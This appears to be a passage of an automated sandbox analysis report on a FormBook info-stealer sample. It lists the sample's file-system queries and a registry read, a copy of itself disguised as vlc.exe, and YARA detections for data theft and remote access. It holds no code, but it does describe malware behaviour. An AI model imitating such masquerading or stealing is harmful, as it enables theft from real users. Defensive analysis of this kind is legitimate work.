Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
